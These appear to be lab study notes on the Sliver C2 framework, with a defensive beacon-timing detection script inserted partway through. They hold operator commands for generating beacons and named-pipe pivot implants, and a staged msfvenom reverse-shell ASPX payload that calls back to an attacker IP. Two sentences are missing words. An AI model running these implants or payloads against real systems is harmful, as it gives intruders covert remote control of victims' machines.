Sliver's server component is the endpoint that implants communicate back to.
Sliver's client component is where the operator executes the commands and tools needed to fulfill their objectives.
A downside of not having a separate server and client is that everything runs inside a single Sliver process, so if you accidentally terminate that process, you might lose the beacons or sessions.
Intrusionz3r0@htb[/htb]$ git clone https://github.com/MrAle98/chisel
Intrusionz3r0@htb[/htb]$ cd chisel/
Intrusionz3r0@htb[/htb]$ mkdir ~/.sliver-client/extensions/chisel
Intrusionz3r0@htb[/htb]$ cp extension.json ~/.sliver-client/extensions/chisel
Intrusionz3r0@htb[/htb]$ sudo apt install golang-go
Intrusionz3r0@htb[/htb]$ make windowsdll_64
Intrusionz3r0@htb[/htb]$ make windowsdll_32
| Aspect | Beacon Mode | Session Mode |
| --- | --- | --- |
| Definition | Operates in intervals, executing commands at set periods. | Enables immediate execution of commands by the operator. |
| Purpose | Used for stealthy, long-term operations where maintaining a low profile is essential. | Used for active tasks requiring instant feedback and uninterrupted communication. |
| Operation | Executes commands periodically at predefined intervals. | Provides real-time interaction and immediate execution of commands. |
| Ideal Use Case | Long-term persistence and low-profile operations. | Active tasks and situations demanding immediate operator feedback. |
sliver > generate beacon --http <your_server_ip> --os linux --arch x86 --format elf --seconds 5 --jitter 3
sliver > generate beacon --mtls <your_server_ip> --os windows --arch amd64 --format exe --save /var/www/html
-J / --jitter sets the jitter of the implant's callback, so the callback time fluctuates based on this value.
-S / --seconds sets the time interval of the callback.
-l / --skip-symbols skips symbol obfuscation.
One of the main disadvantages of skipping symbol obfuscation is that the beacon is easily detectable as Sliver, because its imports appear in plaintext.
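From the defender's side, the --seconds and --jitter values above determine how regular a beacon's check-ins look in flow or proxy logs. The following is an added example, not code from Sliver or from these notes: it groups constructed flow records by host pair and flags pairs whose gaps are tightly clustered. It assumes each check-in delay falls between the interval and the interval plus the jitter; the names assess, scan and SAMPLE_FLOWS are hypothetical.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample data: connection start times in seconds for three host pairs.
# Assumption: a beacon with interval 5 and jitter 3 checks in every 5 to 8 seconds.
BEACON_TS = [0.0, 6.2, 13.9, 19.4, 26.8, 32.1, 39.7, 45.0, 51.3, 58.9]
BROWSE_TS = [0.0, 0.4, 0.9, 31.0, 31.2, 95.5, 96.0, 240.3, 241.1, 600.7]
SAMPLE_FLOWS = (
    [(t, "10.0.0.21", "203.0.113.10:80") for t in BEACON_TS]
    + [(t, "10.0.0.34", "198.51.100.7:443") for t in BROWSE_TS]
    + [(t, "10.0.0.50", "198.51.100.9:443") for t in (0.0, 5.0, 10.0)]
)


def assess(timestamps, min_events=8, max_cv=0.35):
    """Classify one host pair's connection timing as periodic or irregular."""
    ts = sorted(timestamps)
    if len(ts) < min_events:
        return {"verdict": "insufficient-data"}  # too few events to judge timing
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    avg = mean(gaps)
    # Coefficient of variation: small for interval-plus-jitter timing, large for bursts.
    cv = pstdev(gaps) / avg if avg > 0 else float("inf")
    return {
        "verdict": "periodic" if cv <= max_cv else "irregular",
        "est_interval": round(min(gaps), 1),  # shortest gap approximates the interval
        "est_jitter": round(max(gaps) - min(gaps), 1),  # spread approximates the jitter
        "cv": round(cv, 3),
    }


def scan(flows):
    """Group (timestamp, src, dst) records by host pair and assess each pair."""
    by_pair = defaultdict(list)
    for ts, src, dst in flows:
        by_pair[(src, dst)].append(ts)
    return {pair: assess(times) for pair, times in by_pair.items()}


if __name__ == "__main__":
    for pair, result in scan(SAMPLE_FLOWS).items():
        print(pair, result)
```

Real check-ins also carry network latency and missed polls, so thresholds such as max_cv need tuning against baseline traffic.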
Named pipes are primarily used for pivoting on Windows.
Though Sliver's C2 traffic looks legitimate, using HTTPS, mTLS, or WireGuard listeners to establish a more secure channel adds a layer of protection.
# Start the named pipe pivot listener
[server] sliver (http_beacon) > pivots named-pipe --bind firstpipe
[*] Started named pipe pivot listener \\.\pipe\firstpipe with id 1
# Generate a pivot implant
sliver > generate --named-pipe 127.0.0.1/pipe/firstpipe -N pipe_silver --skip-symbols
[*] Generating new windows/amd64 implant binary
[!] Symbol obfuscation is disabled
[*] Build completed in 1s
[*] Implant saved to /home/intrusionz3r0/pipe_silver.exe
Create shellcode with MSFVenom and Sliver
We need to create a profile, a stage listener, and a stager, and then generate a payload through msfvenom.
sliver > profiles new --http 10.10.14.5:8088 --format shellcode z3r0
[*] Saved new implant profile z3r0
sliver > stage-listener --url tcp://10.10.14.5:4443 --profile z3r0
[*] No builds found for profile z3r0, generating a new one
[*] Sliver name for profile z3r0: SURVIVING_DUMP
[*] Job 1 (tcp) started
sliver > http -L 10.10.14.5 -l 8088
[*] Starting HTTP :8088 listener ...
[*] Successfully started job #2
sliver > generate stager --lhost 10.10.14.5 --lport 4443 --format csharp --save staged.txt
# Lastly, create the payload and replace the staged.txt in sliver.aspx.
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.5 LPORT=4443 -f aspx > sliver.aspx
Sliver can host multiple operators simultaneously in a mode known as .
is a tool used to enumerate the environment written in C# used both by red team operators (professionals) and blue team members to assess the current security posture.
Donut is a tool focused on creating binary shellcode that can be executed in memory; it generates shellcode from a .NET binary, which can be executed via the execute-shellcode argument in Sliver.